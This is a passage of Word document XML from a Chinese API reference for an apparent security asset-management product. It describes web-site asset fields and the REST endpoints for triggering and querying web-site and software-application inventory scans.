      <w:tr w:rsidR="00497C54" w14:paraId="4A2B60D8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60F205FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>portStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FDC7C2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="089485D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44DF6B7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口状态:-1 - 端口状态未知; 0 – 仅内网可访问;1 - 外网可访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="518CB744" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D2F0E6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>securityEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1148F172" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36635C7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CDFD21F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否开启安全模块 false- 未开启 true-开启 （仅Linux及Windows-nginx）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3AFB0658" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E5F9AE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>virtualDir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54C6324F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5284E8D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path：varchar(1024) physicalPath：varchar(1024) root：tinyint(1) owner：varchar(512) group：bigint(20) permission: varchar(7) acls aceType：tinyint(4) user: varchar(512) userType：tinyint(4) accessMask:bigint(20) appPath: varchar(1024) appPool name: varchar(512) identityType: tinyint(4) user: varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FE5B91A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>虚拟目录信息 path：虚拟地址 physicalPath：物理地址 root：是否主目录 owner：目录所有者 group：目录所属用户组 仅linux permission：目录权限 仅linux acls：仅windows aceType ace类型 user 用户名 userType 用户类型 accessMask 访问控制掩码数组 appPath: 应用程序路径 （仅Windows-IIS） appPool: 程序池信息（仅Windows-IIS） name 程序池名称 identityType 运行账户标识 user 运行账户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7DFB94FB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B2F2706" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AF8EED6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AEF89E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参考虚拟目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0289DD4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主目录信息 path：虚拟地址 physicalPath：物理地址 root：是否主目录 owner：目录所有</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>者 group：目录所属用户组 仅linux permission：目录权限 仅linux acls：仅windows aceType ace类型 user 用户名 userType 用户类型 accessMask 访问控制掩码数组 appPath: 应用程序路径 （仅Windows-IIS） appPool: 程序池信息（仅Windows-IIS） name 程序池名称 identityType 运行账户标识 user 运行账户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="206D13C6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="378F625D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>virtualDirCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12BD5A09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0533D35B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303FF37F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>虚拟路径数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="576565CC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="139C5518" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bindingCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F793C1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1903AF1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D614373" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>绑定地址数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="770FC2CA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67FF26D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>deployPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4281D6E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A1D483D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(4096)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2068FF1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>War包部署总目录（仅Linux-Tomcat/Weblogic/JBoss/Wildfly/Jetty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="027ECE7E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32B0B59F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>configName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40346084" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="346773EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(4096)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FD75257" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>仅IIS可用，站点别名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="00187DB9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55C4670D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AB24F2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5593EF40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="274E40CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>仅IIS可用，站点状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C3B9FCD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="469BCABE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61BDBF21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="475A2FE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(4096)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69EB8AE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>仅WINDOWS的weblogic\webshpere\jetty\wildfly使用，站点物理地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="666E2894" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="web站点信息扫描"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r>
        <w:t>web站点信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B179CF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求web站点信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ECA7F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F45D1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/website/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A4E5B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0DA8EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1640D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C2A561" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/website/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4F429E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABB9312" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7905F420" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7473609D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094E63F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:pict w14:anchorId="50093541">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5CE699"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27E2E95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A075173" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15CC88C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62A76E77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C45ABF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A8DD538" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="471D7FF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51C2579B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27A7B658" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="680B0A0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E396ACE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="web站点信息查询扫描状态"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r>
        <w:t>web站点信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC35A24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询web站点信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10661A48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="软件应用信息"/>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r>
        <w:t>软件应用信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380AF1BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E867E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的软件应用信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE6E201" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70793F70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>软件应用信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7683AE49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C21770" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1509F357" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C9074E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>软件应用信息查询结果；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A05BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>软件应用信息扫描；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172B0BAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>软件应用信息查询扫描状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B30BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503943B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用软件应用信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE7656C"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2B2AC4F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D209D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="软件应用信息查询结果"/>
      <w:r>
        <w:t>软件应用信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECFA6EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询软件应用信息，按每台主机每个软件应用进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F442360" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640DD9C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/app/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0268F1E7"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246"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
